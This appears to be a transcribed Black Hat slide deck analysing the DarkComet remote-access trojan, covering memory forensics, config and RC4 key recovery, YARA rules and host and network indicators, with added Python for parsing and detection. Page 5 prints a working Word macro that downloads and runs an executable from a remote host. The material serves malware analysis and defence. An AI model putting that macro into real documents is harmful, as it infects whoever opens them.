DarkComet Blackhat Presentation 2015_08_05
Tyler Halfpop, Fidelis Cybersecurity
Aug 19, 2015
Page 1: DarkComet Blackhat Presentation 2015_08_05

DarkComet Blackhat

Tyler Halfpop, Fidelis Cybersecurity

Page 2: DarkComet Blackhat Presentation 2015_08_05

$ whoami

• Threat Researcher for Fidelis CyberSecurity
• Working on doctorate in computer science
• SANS Lethal Forensicator
• CISSP, GREM
• Site: tylerhalfpop.com | Twitter: @tylerhalfpop

Page 3: DarkComet Blackhat Presentation 2015_08_05

About This Talk

• DarkComet at 100mph
• What?
• How?
• Response

DarkComet About Screen

Page 4: DarkComet Blackhat Presentation 2015_08_05

DarkComet About

Names: DarkComet, DarkKomet, Fynlos, Fynloski
Fully featured RAT written in Delphi

Page 5: DarkComet Blackhat Presentation 2015_08_05

Attack Simulation

Word Doc with Macro

Sub AutoOpen()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "http://192.168.66.254/bad.exe", False
    xHttp.Send

    With bStrm
        .Type = 1
        .Open
        .write xHttp.responseBody
        .savetofile "bad.exe", 2
    End With

    Shell ("bad.exe")
End Sub

Page 6: DarkComet Blackhat Presentation 2015_08_05

Attack Simulation Build Video

• Build the downloader
• Build the DarkComet implant
• Setup the Client Listener

Page 7: DarkComet Blackhat Presentation 2015_08_05

Attack Simulation Video

• Victim opens the word document
• Downloads and executes the downloader
• Downloader downloads and executes the DarkComet RAT
• RAT controller has full control of the victim system

Page 8: DarkComet Blackhat Presentation 2015_08_05
Page 9: DarkComet Blackhat Presentation 2015_08_05
Page 10: DarkComet Blackhat Presentation 2015_08_05

Memory Forensics with Volatility

python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 psxview
Volatility Foundation Volatility Framework 2.4
Offset(P)  Name                 PID    pslist psscan thrdproc pspcid csrss session deskthrd
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- --------
0x3fd6ca58 svchost.exe          3348   True   True   True     True   True  True    True
0x3e659030 OSPPSVC.EXE          4060   True   True   True     True   True  True    True
0x3fa5f488 DumpIt.exe           2888   True   True   True     True   True  True    True
0x3e8db030 lsass.exe            496    True   True   True     True   True  True    False
0x3e6ea030 vmtoolsd.exe         1536   True   True   True     True   True  True    True
0x3fdba8a8 sppsvc.exe           3304   True   True   True     True   True  True    True
0x3e6670f0 spoolsv.exe          1284   True   True   True     True   True  True    True
0x3e8dc9b0 lsm.exe              504    True   True   True     True   True  True    False
0x3e963688 svchost.exe          616    True   True   True     True   True  True    True
0x3e475d40 conhost.exe          708    True   True   True     True   True  True    True
0x3e8a4848 winlogon.exe         428    True   True   True     True   True  True    True
0x3fa51030 msdcsc.exe           3384   True   True   True     True   True  True    True
0x3e473a78 TPAutoConnect.       644    True   True   True     True   True  True    True
0x3f27fd40 csrss.exe            392    True   True   True     True   False True    True
0x3f264030 csrss.exe            344    True   True   True     True   False True    True
0x3f2f2d40 smss.exe             252    True   True   True     True   False False   False
0x3fffa9e8 System               4      True   True   True     True   False False   False

Page 11: DarkComet Blackhat Presentation 2015_08_05

Memory Forensics with Volatility

python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 memdump -p 3384 --dump-dir /vt/demo/
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing msdcsc.exe [  3384] to 3384.dmp

Page 12: DarkComet Blackhat Presentation 2015_08_05

Memory Forensics with Volatility

strings -a /vt/demo/3384.dmp | less
…
#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-C8LPD3P}
SID={Guest16}
FWB={0}
NETDATA={192.168.66.10:1604}
GENCODE={U69tAi8fwsqT}
INSTALL={1}
COMBOPATH={7}
EDTPATH={MSDCSC\msdcsc.exe}
KEYNAME={MicroUpdate}
EDTDATE={16/04/2007}
PERSINST={0}
MELT={0}
CHANGEDATE={0}
DIRATTRIB={0}
FILEATTRIB={0}
FAKEMSG={1}
MSGTITLE={Don't Worry}
MSGCORE={49742773206E6F2070726F626C656D210D0A}
MSGICON={64}
OFFLINEK={1}
#EOF DARKCOMET DATA --
…
#KCMDDC51#-890

Page 13: DarkComet Blackhat Presentation 2015_08_05

python -c "from Crypto.Cipher import ARC4; print ARC4.new(\"#KCMDDC51#-890\").decrypt(\"BF7CAB464EFB\".decode('hex'))"

IDTYPE
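The two steps on pages 12 and 13, pulling the embedded config out of the strings dump and RC4-decrypting a banner with the key found in the same dump, are easy to automate for triage. The following is an added example, not code from the slides or from Fidelis: it implements RC4 in plain Python (so no pycrypto dependency, unlike the one-liner above), parses the KEY={value} block between the #BEGIN/#EOF markers, and summarises the fields a responder needs first. The sample strings text is a constructed excerpt copied from page 12 with line breaks added; the key name DARKCOMET_51_KEY and the helper names are this example's own.

```python
import re

# Pure-Python RC4 (KSA + PRGA) so the example needs no third-party module;
# it replaces the pycrypto ARC4 call used in the one-liner on page 13.
def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation, XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# Default DarkComet 5.1 key as recovered from the memory dump on page 12.
DARKCOMET_51_KEY = b"#KCMDDC51#-890"

def decrypt_banner(hex_banner: str, key: bytes = DARKCOMET_51_KEY) -> str:
    """RC4-decrypt a hex-encoded network banner and return it as text."""
    return rc4(key, bytes.fromhex(hex_banner)).decode("latin-1")

# Constructed excerpt of `strings -a 3384.dmp` output, copied from page 12
# (line breaks added; a real dump interleaves many unrelated strings).
SAMPLE_STRINGS = r"""
...
#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-C8LPD3P}
SID={Guest16}
FWB={0}
NETDATA={192.168.66.10:1604}
GENCODE={U69tAi8fwsqT}
INSTALL={1}
COMBOPATH={7}
EDTPATH={MSDCSC\msdcsc.exe}
KEYNAME={MicroUpdate}
EDTDATE={16/04/2007}
PERSINST={0}
MELT={0}
CHANGEDATE={0}
DIRATTRIB={0}
FILEATTRIB={0}
FAKEMSG={1}
MSGTITLE={Don't Worry}
MSGCORE={49742773206E6F2070726F626C656D210D0A}
MSGICON={64}
OFFLINEK={1}
#EOF DARKCOMET DATA --
...
#KCMDDC51#-890
"""

CONFIG_BLOCK_RE = re.compile(r"#BEGIN DARKCOMET DATA --(.*?)#EOF DARKCOMET DATA --", re.S)
KEY_VALUE_RE = re.compile(r"([A-Z]+)=\{([^}]*)\}")

def parse_config(text: str) -> dict:
    """Extract the KEY={value} pairs between the DarkComet config markers."""
    block = CONFIG_BLOCK_RE.search(text)
    if not block:
        return {}
    return dict(KEY_VALUE_RE.findall(block.group(1)))

def summarize(cfg: dict) -> dict:
    """Pull out the fields an incident responder acts on first."""
    host, _, port = cfg.get("NETDATA", "").rpartition(":")
    fake_msg = bytes.fromhex(cfg["MSGCORE"]).decode("latin-1") if cfg.get("MSGCORE") else ""
    return {
        "c2_host": host,
        "c2_port": int(port) if port else None,
        "mutex": cfg.get("MUTEX"),
        "install_path": cfg.get("EDTPATH"),
        "run_key_name": cfg.get("KEYNAME"),
        "fake_message": fake_msg,            # MSGCORE is hex-encoded text
    }

if __name__ == "__main__":
    cfg = parse_config(SAMPLE_STRINGS)
    for k, v in summarize(cfg).items():
        print(f"{k:>14}: {v!r}")
    print("banner BF7CAB464EFB ->", decrypt_banner("BF7CAB464EFB"))
```

Run it against the output of `strings -a` on the dumped process and the NETDATA value gives the C2 host and port to block, while MUTEX, EDTPATH and KEYNAME feed the host detections on page 14. MSGCORE is the hex-encoded text of the fake message box the implant shows when FAKEMSG is set.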

Page 14: DarkComet Blackhat Presentation 2015_08_05

Host Detections

Default Mutex: DC_MUTEX-[A-Z0-9]{7}
Default Dropped File: *\MSDCSC\msdcsc.exe
Keylog Files: %TMP%/dclogs/YYYY-MM-DD-#.dc

Registry Persistence:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Hidden iexplorer.exe processes with no visible parent process
Host file changes

5.4 Legacy Server Module has a visible GUI and system tray icon

Page 15: DarkComet Blackhat Presentation 2015_08_05

Yara Rules

rule DarkComet
{
    meta:
        description = "DarkComet RAT"
        author = "Fidelis Cybersecurity"
        date = "2015-07-22"

    strings:
        $s1 = "#KCMDDC"
        $s2 = "DCDATA"
        $s3 = "#BOT#CloseServer"
        $s4 = "#BOT#SvrUninstall"
        $s5 = "#BOT#URLDownload"

    condition:
        uint16(0) == 0x5a4d and filesize < 50MB and all of ($s*)
}

rule DarkCometDownloader
{
    meta:
        description = "DarkComet RAT"
        author = "Fidelis Cybersecurity"
        date = "2015-07-22"

    strings:
        $s1 = { 6A00FF15F0304000A30D1040006A0A68261040006A00FF15F4304000A311104000FF35111040006A00FF15F8304000A315104000FF35111040006A00FF15FC304000A319104000FF3515104000FF1500314000A31D104000FF3519104000FF351D104000682C114000FF1508314000FF3515104000FF150C31400031C0682C104000682C104000FF15143140006805104000682C104000FF1510314000682C104000FF15183140006A006A00682C104000682C1140006A00FF15803040006A056A006A00682C10400068001040006A00FF15A83040006A00FF1504314000 }

    condition:
        uint16(0) == 0x5a4d and filesize < 10KB and all of them
}

Page 16: DarkComet Blackhat Presentation 2015_08_05

Network Detections

Default Port: 1604 TCP
Dynamic DNS: No-IP.com
Default Banners (six 6-byte values; the last is the one decrypted to IDTYPE on page 13):

8EA4AB05FA7E
B47CB892B702
C7CF9C7CD932
155CAD31A61F
1164805C82EE
BF7CAB464EFB

Check for regular beaconing and inspect FTP traffic, because the keylogger can be configured to deliver data over FTP.
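The host indicators on page 14 and the network indicators on page 16 can be turned into simple matching logic. The block below is an added example, not part of the talk or of any Fidelis tooling: it checks mutex names and file paths against the page's patterns, looks for the six banner values in a payload, and flags peers that are contacted at near-constant intervals (the "regular beaconing" the slide asks for). The flow records, the IP 192.168.66.20, the 10.0.0.5 web traffic and the jitter threshold are constructed for the demonstration; the threshold is a starting point to tune, not a value from the slides.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# ---- Host indicators from page 14 ----
DC_MUTEX_RE = re.compile(r"^DC_MUTEX-[A-Z0-9]{7}$")
DC_DROPPED_FILE_RE = re.compile(r"[\\/]MSDCSC[\\/]msdcsc\.exe$", re.IGNORECASE)
DC_KEYLOG_RE = re.compile(r"[\\/]dclogs[\\/]\d{4}-\d{2}-\d{2}-\d+\.dc$", re.IGNORECASE)

def classify_host_artifact(kind: str, value: str):
    """Map a mutex name or file path to the DarkComet indicator it matches (or None)."""
    if kind == "mutex" and DC_MUTEX_RE.match(value):
        return "darkcomet_default_mutex"
    if kind == "file":
        if DC_DROPPED_FILE_RE.search(value):
            return "darkcomet_dropped_file"
        if DC_KEYLOG_RE.search(value):
            return "darkcomet_keylog_file"
    return None

# ---- Network indicators from page 16 ----
DC_DEFAULT_PORT = 1604
# The 72 hex characters on page 16 read as six 6-byte banners; the last one is
# the RC4-encrypted "IDTYPE" greeting decrypted on page 13.
DC_BANNERS = [bytes.fromhex(h) for h in (
    "8EA4AB05FA7E", "B47CB892B702", "C7CF9C7CD932",
    "155CAD31A61F", "1164805C82EE", "BF7CAB464EFB")]

def has_darkcomet_banner(payload: bytes) -> bool:
    """True if any known banner appears anywhere in a captured TCP payload."""
    return any(banner in payload for banner in DC_BANNERS)

def find_regular_beacons(flows, min_count=4, max_jitter=0.15):
    """flows: iterable of (datetime, src_ip, dst_ip, dst_port).
    Returns [((src, dst, port), mean_interval_seconds)] for peers contacted at
    least min_count times with near-constant spacing (pstdev/mean <= max_jitter)."""
    by_peer = defaultdict(list)
    for ts, src, dst, port in flows:
        by_peer[(src, dst, port)].append(ts)
    hits = []
    for peer, stamps in by_peer.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            hits.append((peer, round(mean, 1)))
    return hits

# Constructed flow log: a host checking in to the C2 from page 12 every ~60 s,
# plus irregular web traffic that should not be flagged.
T0 = datetime(2015, 4, 1, 21, 40, 0)
SAMPLE_FLOWS = (
    [(T0 + timedelta(seconds=60 * i + j), "192.168.66.20", "192.168.66.10", DC_DEFAULT_PORT)
     for i, j in enumerate((0, 1, -2, 1, 0))]
    + [(T0 + timedelta(seconds=s), "192.168.66.20", "10.0.0.5", 443)
       for s in (5, 9, 140, 151, 400)]
)

if __name__ == "__main__":
    print(classify_host_artifact("mutex", "DC_MUTEX-C8LPD3P"))
    print(classify_host_artifact("file", r"C:\Users\victim\Documents\MSDCSC\msdcsc.exe"))
    print(has_darkcomet_banner(bytes.fromhex("BF7CAB464EFB")))
    for peer, interval in find_regular_beacons(SAMPLE_FLOWS):
        print("regular beacon:", peer, "every", interval, "s")
```

The beacon check deliberately ignores the destination port, so it still fires when an operator moves the listener off 1604; the banner match is the higher-confidence signal and the interval check is the broader net. Both patterns assume the default build options seen in the page 12 config (default mutex prefix, MSDCSC install directory), so a customised build can evade the host patterns while still beaconing regularly.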

Page 17: DarkComet Blackhat Presentation 2015_08_05

QUESTIONS?
THANK YOU

[email protected]

@tylerhalfpop tylerhalfpop.com | @FidSecSys fidelissecurity.com